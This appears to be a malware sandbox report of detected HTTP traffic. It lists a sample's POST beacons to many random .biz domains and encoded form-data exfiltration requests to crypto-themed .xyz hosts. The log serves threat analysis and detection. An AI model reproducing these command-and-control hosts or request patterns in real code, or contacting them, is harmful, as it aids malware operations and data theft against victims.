            Source: global trafficHTTP traffic detected: POST /cywpqy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /mklf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: GET /7bzp/?46X=aR6WdwHaaPmew49IGl9c2CyrORGhdUxKRjpfDDDEmaIVpXDnsjMmJ0s7T5q7/mJAEyjBMk5h7mx5tXd7udb6EMTlIvch2q9+PHlpJuVOHss5uOhsYNovhdM=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dappbtc.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /md HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /xratnw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gaqxnqmquyb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /xgcio HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /bgetrgyagt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gwo6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.stakemask.xyzOrigin: http://www.stakemask.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.stakemask.xyz/gwo6/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 34 36 58 3d 42 44 73 71 48 61 55 76 78 6f 41 37 4c 30 6d 38 4f 33 2b 74 62 7a 74 49 48 69 43 45 2b 6b 4b 63 35 36 51 47 75 4b 35 4f 38 35 64 59 6b 43 44 63 7a 31 47 31 74 36 4f 46 57 43 6e 66 73 6b 4c 4e 66 6c 6f 66 64 71 69 61 58 65 34 6d 2f 38 78 7a 7a 45 4b 68 45 34 4f 4d 46 33 44 4d 5a 6c 61 52 70 2f 49 41 41 59 6b 7a 6d 4e 59 35 56 6a 76 6c 34 74 64 48 46 4e 75 37 51 76 66 43 78 4d 65 61 4d 6c 54 64 39 34 7a 64 6a 44 35 47 44 58 77 47 68 73 39 34 79 4c 67 4b 38 79 62 4c 6a 78 53 42 2f 7a 64 66 77 45 58 37 41 38 30 6f 4e 36 36 54 48 49 4c 44 35 6c 2f 35 50 39 4a 6e 67 69 46 44 47 51 3d 3d Data Ascii: 46X=BDsqHaUvxoA7L0m8O3+tbztIHiCE+kKc56QGuK5O85dYkCDcz1G1t6OFWCnfskLNflofdqiaXe4m/8xzzEKhE4OMF3DMZlaRp/IAAYkzmNY5Vjvl4tdHFNu7QvfCxMeaMlTd94zdjD5GDXwGhs94yLgK8ybLjxSB/zdfwEX7A80oN66THILD5l/5P9JngiFDGQ==
            Source: global trafficHTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /muttjirlpdgbukm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gwo6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.stakemask.xyzOrigin: http://www.stakemask.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220Referer: http://www.stakemask.xyz/gwo6/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 34 36 58 3d 42 44 73 71 48 61 55 76 78 6f 41 37 4b 58 2b 38 4d 57 2b 74 54 7a 74 4c 49 43 43 45 33 45 4b 59 35 36 73 47 75 49 56 65 38 4e 78 59 6b 6a 54 63 68 68 71 31 73 36 4f 46 65 69 6e 51 79 55 4c 47 66 6c 55 39 64 71 65 61 58 66 63 6d 2f 2f 6c 7a 7a 33 69 2b 45 6f 4f 43 4a 58 44 4b 57 46 61 52 70 2f 49 41 41 62 59 4e 6d 4e 41 35 55 54 66 6c 37 4d 63 31 4d 74 75 38 47 2f 66 43 31 4d 65 65 4d 6c 54 6a 39 35 76 37 6a 42 42 47 44 54 30 47 68 65 46 33 38 4c 67 4d 79 53 61 62 73 43 69 4d 2f 69 6c 52 76 46 37 4d 42 66 34 57 4d 38 33 4a 57 35 71 55 72 6c 62 4b 53 36 41 54 74 68 34 4b 64 62 5a 78 69 50 54 7a 55 36 67 54 4e 6b 4d 32 4b 53 6e 58 50 66 4d 3d Data Ascii: 46X=BDsqHaUvxoA7KX+8MW+tTztLICCE3EKY56sGuIVe8NxYkjTchhq1s6OFeinQyULGflU9dqeaXfcm//lzz3i+EoOCJXDKWFaRp/IAAbYNmNA5UTfl7Mc1Mtu8G/fC1MeeMlTj95v7jBBGDT0GheF38LgMySabsCiM/ilRvF7MBf4WM83JW5qUrlbKS6ATth4KdbZxiPTzU6gTNkM2KSnXPfM=
            Source: global trafficHTTP traffic detected: POST /qfvxeaopmentlx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /eppcwlxjodqddevc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /dcsip HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gtynebhqjtfhfyti HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gwo6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.stakemask.xyzOrigin: http://www.stakemask.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6476Referer: http://www.stakemask.xyz/gwo6/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 34 36 58 3d 42 44 73 71 48 61 55 76 78 6f 41 37 4b 58 2b 38 4d 57 2b 74 54 7a 74 4c 49 43 43 45 33 45 4b 59 35 36 73 47 75 49 56 65 38 4e 35 59 6b 78 4c 63 7a 57 2b 31 76 36 4f 46 43 79 6e 54 79 55 4c 68 66 6c 4d 35 64 71 53 67 57 73 59 6d 35 38 42 7a 31 52 32 2b 4e 34 4f 43 59 6e 44 77 53 46 61 54 70 2f 5a 4a 41 59 6b 4e 6d 4e 63 35 55 54 66 6c 34 39 63 31 46 64 75 2b 47 2f 66 71 2b 73 65 61 4d 6c 54 64 39 34 61 67 6a 31 39 47 44 7a 6b 47 36 4e 39 33 30 4c 67 4f 78 53 62 65 73 43 75 50 2f 6a 4d 51 76 48 4c 6d 41 74 77 57 50 4a 47 31 4d 6f 57 31 70 57 2f 56 4d 62 6f 65 74 7a 67 58 62 37 74 4d 70 76 33 2f 57 72 45 68 48 55 68 67 66 44 50 48 5a 75 65 2f 5a 38 5a 43 6d 65 6f 61 70 4a 64 4c 47 50 4f 42 65 51 36 6f 35 36 42 59 55 61 5a 73 4a 33 55 78 63 75 6d 67 66 6e 65 41 2f 6d 2f 66 33 47 61 4e 47 74 4e 55 43 4e 76 6e 55 61 31 2b 73 4f 72 71 7a 46 48 6c 74 43 56 4c 6f 34 4c 45 4c 42 71 78 2b 43 38 43 37 74 61 69 49 50 37 56 6b 49 4c 67 46 4c 2b 6f 7a 6e 34 43 61 4b 53 61 37 7a 77 74 64 77 47 76 43 4c 4d 63 72 57 61 59 34 64 50 53 78 7a 59 56 79 45 79 7a 6a 79 73 55 77 50 7a 46 2b 6f 4e 56 6e 6c 35 34 72 6c 4c 6b 6a 30 61 62 64 59 30 6a 6f 57 70 48 76 54 6e 50 4e 6d 33 32 70 32 5a 4d 65 68 78 75 6c 63 46 57 34 72 61 6c 4c 57 57 55 76 57 74 44 6e 7a 75 64 64 38 68 2f 52 35 4e 2f 68 30 62 45 68 63 57 59 4e 74 6d 49 2f 31 44 64 30 2b 66 41 4f 76 57 45 63 47 53 64 6e 44 50 36 34 4c 72 38 35 74 47 4f 39 44 42 51 2b 47 50 30 33 72 74 6b 2f 48 74 63 45 30 52 43 39 43 56 64 4e 4a 71 35 45 31 46 50 74 41 46 2b 63 4f 6d 6f 63 45 41 62 6f 47 44 30 73 32 52 79 49 41 6e 64 70 68 68 69 55 64 41 6e 78 51 6d 76 49 43 53 53 56 76 4a 63 46 6e 72 69 50 42 33 36 75 59 49 76 77 45 41 5a 4b 2b 33 65 4c 75 37 71 67 77 62 31 56 32 73 77 6b 64 43 63 71 63 54 31 55 6c 4b 49 69 36 53 6f 6c 47 33 74 52 37 77 7a 32 57 53 43 4d 2f 70 4e 45 70 65 36 5a 31 75 73 65 4c 79 34 64 72 47 39 50 72 6b 64 45 55 55 44 45 45 62 49 52 30 7a 52 4d 69 62 36 52 30 35 32 58 78 54 76 54 2f 2b 58 45 74 48 79 50 71 79 74 44 74 75 32 59 36 36 5a 79 62 69 77 67 6e 52 61 4e 54 70 37 4b 73 76 50 6e 66 54 33 38 6a 46 67 42 35 47 59 33 44 5a 6b 72 48 42 46 48 2f 76 42 7a 48 4e 64 72 69 32 4e 4d 6e 77 78 76 67 4c 50 69 36 6e 6d 51 74 49 39 70 6c 41 79 53 4f 75 4e 34 77 36 57 51 69 6a 7a 55 50 37 43 6b 4a 5a 4e 44 52 49 46 70 61 2b 5a 34 69 52 42 32 78 6a 4c 59 73 78 55 49 53 46 47 62 4b 79 68 69 45 48 51 44
            Source: global trafficHTTP traffic detected: POST /nsiowb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /wilwdphot HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /dielwuec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: GET /gwo6/?46X=MBEKEv0ugpgWX2jua16KbRtCIB3s6ka+zKgBsYRR8c9E1EzqhBu48/qzeTOQx3bSOlhdcb/rXf0aputkyH2GEaaTMgSCSx6h1rRpE7wz+fc0QC+fndBMDtU=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.stakemask.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /efa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /wikgynrmq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /k HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /pu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /leke HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /lruowqsqbbhjst HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /bguu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.agistaking.xyzOrigin: http://www.agistaking.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.agistaking.xyz/bguu/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 34 36 58 3d 39 72 78 57 77 65 77 37 44 4b 2f 79 57 6a 65 51 53 33 68 33 6c 2f 4b 58 59 42 4b 30 58 4d 70 68 6f 35 5a 62 48 51 47 32 36 78 6a 4c 35 47 43 6f 73 71 77 2f 64 2b 41 54 59 76 64 72 4a 35 41 31 49 5a 42 56 42 44 58 4e 58 6c 79 7a 32 61 39 79 65 61 7a 42 33 4d 55 54 31 30 4c 59 66 6c 30 39 75 58 46 53 6d 70 4c 38 72 57 6a 51 38 58 70 67 4b 45 50 59 6f 66 66 47 65 74 32 74 74 32 6e 71 63 56 5a 59 44 42 5a 65 49 2f 30 33 62 6a 56 57 61 51 44 46 71 31 79 77 50 7a 31 64 41 56 6b 61 68 67 6a 52 4e 49 75 47 31 6e 59 6e 7a 4a 38 30 66 49 44 6f 72 53 35 32 45 61 4c 35 61 47 46 49 65 41 3d 3d Data Ascii: 46X=9rxWwew7DK/yWjeQS3h3l/KXYBK0XMpho5ZbHQG26xjL5GCosqw/d+ATYvdrJ5A1IZBVBDXNXlyz2a9yeazB3MUT10LYfl09uXFSmpL8rWjQ8XpgKEPYoffGet2tt2nqcVZYDBZeI/03bjVWaQDFq1ywPz1dAVkahgjRNIuG1nYnzJ80fIDorS52EaL5aGFIeA==
            Source: global trafficHTTP traffic detected: POST /clxidyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /scwfgxpswwm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /bguu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.agistaking.xyzOrigin: http://www.agistaking.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220Referer: http://www.agistaking.xyz/bguu/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 34 36 58 3d 39 72 78 57 77 65 77 37 44 4b 2f 79 58 44 75 51 65 77 31 33 74 2f 4b 59 46 78 4b 30 63 73 70 6c 6f 35 46 62 48 54 4c 74 36 48 7a 4c 35 6a 2b 6f 32 6f 55 2f 4f 4f 41 54 4d 2f 63 41 48 5a 41 69 49 5a 64 64 42 47 33 4e 58 6c 32 7a 32 61 4e 79 64 74 50 43 78 4d 55 4e 75 45 4c 61 43 31 30 39 75 58 46 53 6d 70 76 53 72 57 37 51 39 6e 35 67 4c 68 76 62 67 2f 66 42 4b 39 32 74 70 32 6d 74 63 56 5a 36 44 44 68 77 49 39 4d 33 62 68 4e 57 62 42 44 47 7a 46 79 79 43 54 30 2b 4d 77 42 78 35 52 4b 6e 46 34 32 69 79 46 46 4c 37 76 78 75 4f 35 69 2f 35 53 64 46 5a 64 43 4e 58 46 34 42 46 48 58 77 6a 4d 6f 30 4a 76 7a 67 68 44 62 56 4c 4b 53 2b 76 49 59 3d Data Ascii: 46X=9rxWwew7DK/yXDuQew13t/KYFxK0csplo5FbHTLt6HzL5j+o2oU/OOATM/cAHZAiIZddBG3NXl2z2aNydtPCxMUNuELaC109uXFSmpvSrW7Q9n5gLhvbg/fBK92tp2mtcVZ6DDhwI9M3bhNWbBDGzFyyCT0+MwBx5RKnF42iyFFL7vxuO5i/5SdFZdCNXF4BFHXwjMo0JvzghDbVLKS+vIY=
            Source: global trafficHTTP traffic detected: POST /rm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /bguu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.agistaking.xyzOrigin: http://www.agistaking.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6476Referer: http://www.agistaking.xyz/bguu/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 34 36 58 3d 39 72 78 57 77 65 77 37 44 4b 2f 79 58 44 75 51 65 77 31 33 74 2f 4b 59 46 78 4b 30 63 73 70 6c 6f 35 46 62 48 54 4c 74 36 48 37 4c 2b 52 6d 6f 31 49 6f 2f 4e 4f 41 54 50 2f 63 44 48 5a 41 61 49 5a 56 5a 42 47 79 36 51 56 61 7a 77 49 6c 79 5a 4c 7a 43 74 4d 55 4e 37 55 4c 65 51 46 30 2f 75 58 31 57 6d 70 4c 53 72 56 2f 51 39 6e 35 67 4b 30 50 62 70 50 66 44 4b 39 33 71 67 57 6e 71 63 56 5a 59 44 42 52 67 49 4a 77 33 62 42 64 57 64 7a 62 47 37 46 79 38 48 54 30 59 4d 77 46 77 35 52 43 4a 46 35 2f 6e 7a 30 6c 4c 35 4c 67 68 65 4c 71 45 71 44 73 66 42 66 53 4e 65 33 78 47 43 58 58 6f 71 75 41 66 57 4d 76 58 6a 68 57 4b 58 50 65 6f 79 39 76 44 2f 53 68 4b 31 51 38 4b 56 2b 73 61 31 6c 54 41 45 56 72 64 65 74 33 75 38 75 68 76 49 53 63 4e 43 2b 6c 74 48 65 4a 33 36 61 30 4d 2f 63 6d 32 70 67 6e 79 44 43 59 53 4c 48 49 58 61 31 35 73 67 48 31 64 69 67 71 38 59 32 46 6f 55 6d 78 66 75 4c 4f 70 73 30 31 46 55 6c 32 77 47 4c 6a 56 68 64 44 45 38 57 77 51 52 79 74 66 47 5a 61 58 43 43 52 46 34 72 7a 79 4f 2b 42 4a 30 77 44 72 63 63 66 2b 68 6b 70 67 37 42 64 4f 56 37 55 62 51 6d 43 61 43 37 6f 77 33 6c 5a 4e 6b 4a 52 4e 4c 48 71 43 43 7a 37 69 68 47 34 56 7a 61 56 75 4d 71 37 61 5a 61 36 77 35 36 51 66 61 42 35 4e 2b 46 46 77 47 41 55 64 43 4e 67 41 6e 38 70 39 32 71 51 65 67 59 5a 32 63 5a 31 45 4d 2b 44 54 54 69 54 30 4a 62 56 5a 4c 31 45 77 4a 47 33 66 6c 78 49 50 67 44 68 5a 4b 61 70 68 72 74 31 67 2b 50 6d 61 48 31 42 57 49 78 48 6e 44 6a 69 68 6d 30 2b 39 32 39 46 2b 55 4b 63 72 31 4b 57 43 50 6e 37 45 7a 66 47 6f 6c 75 38 35 31 43 54 50 32 52 61 67 71 58 51 65 34 43 33 70 53 74 4e 42 6f 75 32 68 49 4c 54 64 45 4a 44 6a 41 66 6f 2b 68 59 47 61 76 58 50 4b 46 51 2b 75 37 4d 41 50 6f 75 36 53 55 70 6b 5a 59 63 70 75 57 47 4e 73 52 73 71 69 6c 65 46 48 62 2b 38 37 4b 65 59 76 2f 44 30 7a 4a 72 6a 79 7a 2f 62 76 6d 7a 4a 32 41 36 2b 67 52 4f 52 67 41 51 4f 2b 47 67 64 61 73 43 73 59 69 58 61 39 6f 57 70 37 62 70 75 64 6c 61 45 73 65 75 58 30 69 6a 6a 37 41 6a 79 4a 73 56 4c 58 44 45 77 30 41 50 64 6d 73 55 77 54 35 56 66 4c 45 77 7a 61 69 75 45 75 4b 4b 65 30 65 70 4b 32 72 64 4a 2f 53 39 46 77 4a 6e 33 50 44 6d 43 30 4c 70 76 54 4e 39 42 74 49 30 52 35 64 49 50 4a 49 45 71 52 32 56 39 73 55 44 4c 62 4c 7a 66 72 31 34 6c 57 77 51 42 30 31 54 32 6b 31 37 2b 6f 4f 51 77 38 6a 53 36 66 64 47 49 56 41 6a 33 30 53 44 45 4b 71 57 53 62 31 32 74 35
